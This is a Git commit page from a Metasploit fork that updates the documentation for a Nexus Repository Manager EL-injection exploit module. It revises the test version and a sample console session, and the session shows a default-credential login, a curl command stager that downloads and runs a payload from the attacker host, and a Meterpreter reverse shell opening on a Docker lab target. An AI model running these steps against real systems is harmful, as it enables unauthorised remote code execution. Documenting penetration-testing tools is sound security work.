adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Fix some more things

Browse Source
This commit is contained in:
William Vu
2020-04-07 19:28:37 -05:00
parent 6275b16b04
commit baae9db092
2 changed files with 24 additions and 24 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md
+23 -23
View File
@@ -8,8 +8,8 @@ as the "nexus" user.
### Setup
Run `docker run -d -p 8081:8081 --name nexus sonatype/nexus3:3.21.0`
(note the added `3.21.0` tag) as per Sonatype's [Docker Hub instructions](https://hub.docker.com/r/sonatype/nexus3/#running).
Run `docker run -d -p 8081:8081 --name nexus sonatype/nexus3:3.21.1`
(note the added `3.21.1` tag) as per Sonatype's [Docker Hub instructions](https://hub.docker.com/r/sonatype/nexus3/#running).
### Targets
@@ -35,7 +35,7 @@ Set this to a valid Nexus password.
## Scenarios
### Nexus Repository Manager 3.21.1-05 from [Docker Hub](https://hub.docker.com/r/sonatype/nexus3)
### Nexus Repository Manager 3.21.1-01 from [Docker Hub](https://hub.docker.com/r/sonatype/nexus3)
```
msf5 > use exploit/linux/http/nexus_repo_manager_el_injection
@@ -62,31 +62,31 @@ msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Nexus 3.21.0-05 is a vulnerable version.
[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
[*] Logging in with admin:admin
[+] Logged in with NXSESSIONID=b15d9cfc-f8ad-4aba-b203-c36aa78e4670;
[*] Using URL: http://0.0.0.0:8080/SjSMKKomKhhGj
[*] Local IP: http://192.168.1.3:8080/SjSMKKomKhhGj
[*] Generated command stager: ["curl -so /tmp/dXZVXFXS http://192.168.1.3:8080/SjSMKKomKhhGj", "chmod +x /tmp/dXZVXFXS", "/tmp/dXZVXFXS", "rm -f /tmp/dXZVXFXS"]
[*] Executing command: curl -so /tmp/dXZVXFXS http://192.168.1.3:8080/SjSMKKomKhhGj
[*] Client 192.168.1.3 (curl/7.61.1) requested /SjSMKKomKhhGj
[+] Logged in with NXSESSIONID=8b6fd077-1830-4e2b-90e8-2997d260b5c0;
[*] Using URL: http://0.0.0.0:8080/t6NXrxF
[*] Local IP: http://192.168.1.3:8080/t6NXrxF
[*] Generated command stager: ["curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF", "chmod +x /tmp/hgzeytII", "/tmp/hgzeytII", "rm -f /tmp/hgzeytII"]
[*] Executing command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
[+] Successfully executed command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
[*] Client 192.168.1.3 (curl/7.61.1) requested /t6NXrxF
[*] Sending payload to 192.168.1.3 (curl/7.61.1)
[+] Successfully executed command: curl -so /tmp/dXZVXFXS http://192.168.1.3:8080/SjSMKKomKhhGj
[*] Command Stager progress - 52.63% done (60/114 bytes)
[*] Executing command: chmod +x /tmp/dXZVXFXS
[+] Successfully executed command: chmod +x /tmp/dXZVXFXS
[*] Command Stager progress - 71.93% done (82/114 bytes)
[*] Executing command: /tmp/dXZVXFXS
[+] Successfully executed command: /tmp/dXZVXFXS
[*] Command Stager progress - 83.33% done (95/114 bytes)
[*] Executing command: rm -f /tmp/dXZVXFXS
[+] Successfully executed command: rm -f /tmp/dXZVXFXS
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:62404) at 2020-04-04 00:39:23 -0500
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Command Stager progress - 50.00% done (54/108 bytes)
[*] Executing command: chmod +x /tmp/hgzeytII
[+] Successfully executed command: chmod +x /tmp/hgzeytII
[*] Command Stager progress - 70.37% done (76/108 bytes)
[*] Executing command: /tmp/hgzeytII
[+] Successfully executed command: /tmp/hgzeytII
[*] Command Stager progress - 82.41% done (89/108 bytes)
[*] Executing command: rm -f /tmp/hgzeytII
[+] Successfully executed command: rm -f /tmp/hgzeytII
[*] Command Stager progress - 100.00% done (108/108 bytes)
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:53094) at 2020-04-07 19:25:38 -0500
[*] Server stopped.
meterpreter > getuid
Server username: no-user @ 5c29594842aa (uid=200, gid=200, euid=200, egid=200)
Server username: no-user @ 282665c16215 (uid=200, gid=200, euid=200, egid=200)
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Red Hat Enterprise Linux 8 (Linux 4.19.76-linuxkit)
modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
+1 -1
View File
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
return CheckCode::Unknown('Target did not respond with Server header.')
end
# Server: Nexus/3.21.0-05 (OSS)
# Server: Nexus/3.21.1-01 (OSS)
version = res.headers['Server'].scan(%r{^Nexus/([\d.-]+)}).flatten.first
unless version